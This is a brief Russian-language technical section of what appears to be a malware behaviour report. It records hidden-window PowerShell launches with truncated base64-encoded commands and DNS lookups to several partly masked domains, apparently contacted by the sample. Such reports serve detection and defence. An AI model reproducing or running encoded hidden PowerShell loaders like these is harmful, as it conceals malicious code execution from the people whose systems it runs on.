Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHUAYgBiAGUAcgB1AHEAdAA9ACcAQgBlAGQAZgBvAHIAZABzAGgAaQByAGUAcwBxAHIAJwA7ACQAVQBuAGIAcgBhAG4AZAB...
- DNS ASK si####loaded.com
- DNS ASK so###orba.com
- DNS ASK cm#.##mfai-hk.com
- DNS ASK ru###yscrew.com
- DNS ASK we###gay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHUAYgBiAGUAcgB1AHEAdAA9ACcAQgBlAGQAZgBvAHIAZABzAGgAaQByAGUAcwBxAHIAJwA7ACQAVQBuAGIAcgBhAG4AZAB...' (со скрытым окном)